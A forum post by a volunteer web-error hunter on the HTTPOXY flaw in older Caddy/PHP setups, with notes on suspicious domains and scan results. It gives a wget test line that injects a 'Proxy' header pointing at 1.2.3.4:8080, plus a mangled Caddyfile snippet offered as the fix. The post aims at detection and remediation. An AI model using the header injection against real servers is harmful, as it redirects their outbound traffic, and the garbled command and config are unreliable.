HTTPOXY Expoit in caddy environments, again through persistent php weaknesses!

We have for instance a Vimeo videoproxybid ; 80 get body, -snt.ru & -proxyzan dot com.
no I will withhold exact IP and location…we have to be responsible…

Exploitable with older versions of Caddy server via Run 'wget -S -header=‘Proxy’: 1.2.3.4 : 8080

One can test this at https://yourdomain.com grep on info.php
Yes, php stays a ‘can of worms’ always.
A remedy is to strip the header, but how to do this?"
Re the manual: https://www.tutorialspoint.com/php/php_split.htm &
https://www.geeksforgeeks.org/split-a-comma-delimited-string-into-an-array-in-php/

////// 127.0.0.1:80 { root domains/localhost fastcgi /127.0.0.1 :9000 { ext .php split .php index index.php env HTTP_PROXY " } errors } /////
info credits go to NIXTREN on https://github.com/mholt/caddy/issues/955

Detected thanks to the wonderful folks, that map all that insecurity at CENSYS. :wink:

polonus (volunteer webserver error hunter)

For -http://s7.addthis.com/js/300/addthis_widget.js#pubid=rizicn on http://proxyzan.info/
https://www.virustotal.com/gui/url/f641a92d16b2faeef556efc2f01c85dcbe5e282642659e129ba7b6933a8fd6e4/community
Hunt down everything that has more than two IPs and tracks ! :slight_smile:
Results from scanning URL: -//s7.addthis.com/js/300/addthis_widget.js#pubid=rizicn
Number of sources found: 41
Number of sinks found: 16 related to -http://avpn.win.site2preview.com/
link: http://avpn.win/edit-browser.php

pol